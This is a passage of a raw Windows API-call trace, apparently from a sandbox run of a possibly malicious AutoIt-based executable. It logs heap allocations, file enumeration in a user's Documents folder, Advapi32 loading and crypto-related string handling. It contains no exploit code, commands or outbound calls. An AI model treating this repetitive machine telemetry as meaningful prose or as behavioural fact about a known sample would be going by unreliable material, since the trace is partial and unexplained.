0x43ca4d8 [0083.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0083.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0083.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0083.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0083.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0083.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0083.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0083.621] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\desktop.ini", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xc1bc4716, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xc1bc4716, ftLastAccessTime.dwHighDateTime=0x1d47c35, ftLastWriteTime.dwLowDateTime=0xc1bea8c6, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="desktop.ini", cAlternateFileName="")) returned 0x41ac700 [0083.622] FindClose (in: hFindFile=0x41ac700 | out: hFindFile=0x41ac700) returned 1 [0083.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0083.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0083.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0083.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0083.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0083.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0083.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0083.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0083.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0083.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0083.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0083.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0083.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0083.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0083.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0083.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0083.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0083.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0083.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0083.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0083.622] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0083.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0083.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0083.623] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0083.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0083.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0083.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa60 [0083.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0083.623] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0083.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0083.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0083.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0083.623] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0083.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0083.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0083.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca928 [0083.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0083.623] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0083.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0083.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0083.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0083.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0083.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0083.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0083.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0083.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0083.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0083.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0083.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0083.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0083.624] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0083.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0083.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0083.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0083.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0083.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0083.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0083.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0083.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0083.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0083.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0083.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0083.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0083.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0083.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0083.624] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0083.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0083.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0083.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0083.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0083.625] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0083.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0083.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0083.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0083.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0083.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0083.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0083.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0083.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0083.625] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0083.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0083.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391cb0 [0083.625] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0083.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391cb0 | out: hHeap=0x1780000) returned 1 [0083.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0083.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0083.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2590 [0083.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0083.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0083.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0083.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0083.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa18 [0083.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0083.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0083.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0083.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0083.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0083.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0083.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0083.626] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0083.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0083.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0083.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0083.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0083.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0083.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0083.626] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0083.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0083.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0083.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0083.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0083.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0083.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0083.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0083.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0083.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0083.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0083.627] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0083.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0083.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0083.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0083.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0083.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0083.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0083.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0083.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0083.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0083.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0083.627] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0083.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0083.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0083.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0083.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0083.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0083.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0083.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0083.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0083.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0083.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0083.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0083.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0083.628] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0083.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0083.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0083.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9e8 [0083.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0083.628] PeekMessageW (in: lpMsg=0x144e7dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e7dc) returned 0 [0083.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0083.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0083.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0083.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0083.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0083.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0083.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0083.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0083.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0083.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0083.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0083.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0083.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0083.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0083.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0083.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0083.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0083.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0083.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0083.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0083.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0083.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0083.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0083.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0083.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0083.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0083.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0083.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0083.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0083.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0083.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0083.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0083.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0083.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0083.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0083.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0083.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0083.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0083.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0083.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0083.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0083.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0083.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0083.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0083.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0083.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0083.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0083.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0083.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0083.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0083.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0083.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0083.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0083.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0083.630] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0083.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0083.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0083.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0083.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0083.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0083.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0083.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0083.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0083.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0083.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0083.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0083.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0083.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0083.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0083.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0083.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0083.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0083.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0083.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0083.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0083.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0083.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0083.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0083.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0083.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0083.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 